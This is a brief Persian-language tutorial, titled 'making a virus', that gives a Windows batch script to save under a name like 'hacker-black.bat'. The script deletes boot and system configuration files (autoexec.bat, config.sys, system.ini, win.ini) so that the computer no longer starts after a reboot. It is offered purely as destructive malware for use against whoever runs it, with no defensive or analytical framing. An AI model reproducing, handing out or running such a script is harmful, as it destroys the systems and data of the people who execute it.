ساخت ویروس
آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد...
خوب اول یک
Notepad یا همان Txt Document
باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت
Bat
سیو میکنید...
C:
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
مثل:
hacker-black.bat
به جای کلمه هکر بلک هم اسم مورد نظر را بگذارید...